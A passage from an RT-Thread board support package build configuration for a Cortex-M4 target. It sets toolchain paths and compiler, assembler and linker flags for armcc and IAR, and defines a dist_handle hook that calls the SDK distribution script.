CFLAGS += ' -O2'
CXXFLAGS = CFLAGS
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
elif PLATFORM == 'armcc':
# toolchains
CC = 'armcc'
CXX = 'armcc'
AS = 'armasm'
AR = 'armar'
LINK = 'armlink'
TARGET_EXT = 'axf'
DEVICE = ' --cpu Cortex-M4.fp '
CFLAGS = '-c ' + DEVICE + ' --apcs=interwork --c99'
AFLAGS = DEVICE + ' --apcs=interwork '
    LFLAGS = DEVICE + ' --info sizes --info totals --info unused --info veneers --list rt-thread.map --strict --scatter "board/linker_scripts/link.sct"'
CFLAGS += ' -I' + EXEC_PATH + '/ARM/ARMCC/include'
LFLAGS += ' --libpath=' + EXEC_PATH + '/ARM/ARMCC/lib'
CFLAGS += ' -D__MICROLIB '
AFLAGS += ' --pd "__MICROLIB SETA 1" '
LFLAGS += ' --library_type=microlib '
EXEC_PATH += '/ARM/ARMCC/bin/'
if BUILD == 'debug':
CFLAGS += ' -g -O0'
AFLAGS += ' -g'
else:
CFLAGS += ' -O2'
CXXFLAGS = CFLAGS
CFLAGS += ' -std=c99'
POST_ACTION = 'fromelf --bin $TARGET --output rtthread.bin \nfromelf -z $TARGET'
elif PLATFORM == 'iar':
# toolchains
CC = 'iccarm'
CXX = 'iccarm'
AS = 'iasmarm'
AR = 'iarchive'
LINK = 'ilinkarm'
TARGET_EXT = 'out'
DEVICE = '-Dewarm'
CFLAGS = DEVICE
CFLAGS += ' --diag_suppress Pa050'
CFLAGS += ' --no_cse'
CFLAGS += ' --no_unroll'
CFLAGS += ' --no_inline'
CFLAGS += ' --no_code_motion'
CFLAGS += ' --no_tbaa'
CFLAGS += ' --no_clustering'
CFLAGS += ' --no_scheduling'
CFLAGS += ' --endian=little'
CFLAGS += ' --cpu=Cortex-M4'
CFLAGS += ' -e'
CFLAGS += ' --fpu=VFPv4_sp'
CFLAGS += ' --dlib_config "' + EXEC_PATH + '/arm/INC/c/DLib_Config_Normal.h"'
CFLAGS += ' --silent'
AFLAGS = DEVICE
AFLAGS += ' -s+'
AFLAGS += ' -w+'
AFLAGS += ' -r'
AFLAGS += ' --cpu Cortex-M4'
AFLAGS += ' --fpu VFPv4_sp'
AFLAGS += ' -S'
if BUILD == 'debug':
CFLAGS += ' --debug'
CFLAGS += ' -On'
else:
CFLAGS += ' -Oh'
LFLAGS = ' --config "board/linker_scripts/link.icf"'
LFLAGS += ' --entry __iar_program_start'
CXXFLAGS = CFLAGS
EXEC_PATH = EXEC_PATH + '/arm/bin/'
POST_ACTION = 'ielftool --bin $TARGET rtthread.bin'
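# dist_handle below is typically invoked by RT-Thread's distribution tooling
# (e.g. `scons --dist`) so the vendor SDK pieces this BSP depends on are copied
# into the generated dist directory; the exact hook depends on the tools/ scripts in use.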
def dist_handle(BSP_ROOT, dist_dir):
import sys
cwd_path = os.getcwd()
sys.path.append(os.path.join(os.path.dirname(BSP_ROOT), 'tools'))
from sdk_dist import dist_do_building
dist_do_building(BSP_ROOT, dist_dir)
|
apache-2.0
|